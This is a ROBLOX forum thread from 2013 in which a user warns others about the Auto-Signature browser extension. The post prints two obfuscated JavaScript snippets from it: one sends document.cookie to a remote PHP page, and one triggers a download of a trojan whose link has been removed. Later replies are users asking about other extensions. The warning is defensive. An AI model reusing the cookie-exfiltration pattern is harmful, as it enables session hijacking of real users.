SethiXzon
|
  |
| Joined: 21 Aug 2008 |
| Total Posts: 13779 |
|
|
| 03 Jan 2013 01:11 AM |
I recommend you stop using Auto-Signature now. Inside of the source code for the messaging and forum scripts; a section hidden via a resource editor; which I was able to disable; contains a few obfuscated lines of JavaScript.
In messageScript.js, the following can be found.
[script]var _0xafb5=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x5B\x52\x45\x4D\x4F\x56\x45\x44\x5D\x2E\x63\x6F\x2E\x63\x63\x2E\x70\x68\x70\x3F\x63\x6F\x6F\x6B\x69\x65\x3D","\x63\x6F\x6F\x6B\x69\x65","\x5B\x52\x45\x4D\x4F\x56\x45\x44\x5D"];document[_0xafb5[0]]=_0xafb5[1]+document[_0xafb5[2]];document[_0xafb5[0]]=_0xafb5[3];[/script]
When unobfuscated with a tool (although I removed the links for safety), you will see that this sends session data (which I assumed is grabbed from another line that was hidden) to a website.
The other area I was able to restore contains this code; in forumScript.js:
var _0x9730=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x64\x61\x74\x61\x3A\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6F\x63\x74\x65\x74\x2D\x73\x74\x72\x65\x61\x6D\x2C"];function onDownload(){document[_0x9730[0]]=_0x9730[1]+encodeURIComponent([REMOTE ADMINISTRATIVE TROJAN LINK REMOVED]);}
Although the content of this is obvious; it is still encrypted. The code in question retrieves an unknown file and downloads it to your computer.
In short; this is an application with malicious intent and thus should not be utilized until a ROBLOX developer analyzes it further.
I apologize for posting this twice; but I wish to alert every section of the forum. |
|
|
| Report Abuse |
|
|
| |
|
|
| 03 Jan 2013 01:13 AM |
| good to know, i won't be getting that extension then. |
|
|
| Report Abuse |
|
|
| |
|
Bitcoins
|
  |
| Joined: 16 Jul 2012 |
| Total Posts: 335 |
|
| |
|
SSBBMaker
|
  |
| Joined: 31 Aug 2010 |
| Total Posts: 6636 |
|
|
| 03 Jan 2013 01:19 AM |
| ROBLOX just needs to freaking update the forums, god |
|
|
| Report Abuse |
|
|
zinc707
|
  |
| Joined: 16 Dec 2008 |
| Total Posts: 2961 |
|
| |
|
Bitcoins
|
  |
| Joined: 16 Jul 2012 |
| Total Posts: 335 |
|
| |
|
|
| 03 Jan 2013 01:22 AM |
wat about
um
like
hat notifier/forum enhancer/merely's outfit thing |
|
|
| Report Abuse |
|
|
SSBBMaker
|
  |
| Joined: 31 Aug 2010 |
| Total Posts: 6636 |
|
|
| 03 Jan 2013 01:23 AM |
i was JUST about to ask that ^
(what euro said) |
|
|
| Report Abuse |
|
|
zinc707
|
  |
| Joined: 16 Dec 2008 |
| Total Posts: 2961 |
|
| |
|
|
| 03 Jan 2013 01:23 AM |
ok
im still paranoid about that thing though
hat notifier/forum enhancer pls |
|
|
| Report Abuse |
|
|
Bitcoins
|
  |
| Joined: 16 Jul 2012 |
| Total Posts: 335 |
|
| |
|
zinc707
|
  |
| Joined: 16 Dec 2008 |
| Total Posts: 2961 |
|
| |
|
SSBBMaker
|
  |
| Joined: 31 Aug 2010 |
| Total Posts: 6636 |
|
|
| 03 Jan 2013 01:24 AM |
What does merely's thing do anyway? I know of the hat notifier but not the outfit thing |
|
|
| Report Abuse |
|
|
|
| 03 Jan 2013 01:24 AM |
asdfasdff
go look pls!!@!!!!! |
|
|
| Report Abuse |
|
|
|
| 03 Jan 2013 01:25 AM |
ogm hat notifier i uninstall u |
|
|
| Report Abuse |
|
|
|
| 03 Jan 2013 01:26 AM |
so uh
idk if i even trust you right now
but continuing 2 be gullible atm
will uninstalling stop it
or do i hav 2 format computer 2 erase |
|
|
| Report Abuse |
|
|
katsui
|
  |
| Joined: 10 Oct 2009 |
| Total Posts: 2989 |
|
| |
|
Bitcoins
|
  |
| Joined: 16 Jul 2012 |
| Total Posts: 335 |
|
| |
|
|
| 03 Jan 2013 01:27 AM |
ok
so uninstalling it kills it
or does it not kill the malicious stuff
since it's already downloaded |
|
|
| Report Abuse |
|
|
Bitcoins
|
  |
| Joined: 16 Jul 2012 |
| Total Posts: 335 |
|
| |
|
|
| 03 Jan 2013 01:29 AM |
eh quitting anyways
must as well uninstall everything
idk if i should trust you since im gullible
but the paranoia!!!!!!@! |
|
|
| Report Abuse |
|
|
zinc707
|
  |
| Joined: 16 Dec 2008 |
| Total Posts: 2961 |
|
| |
|
Dentists
|
  |
| Joined: 09 Apr 2012 |
| Total Posts: 6624 |
|
|
| 03 Jan 2013 01:30 AM |
It could not be malware.
A lot of this stuff is to ensure the plugin works well, and some firewalls pick it up as harmful because it sends info to the owner (like feedback or crash reports) |
|
|
| Report Abuse |
|
|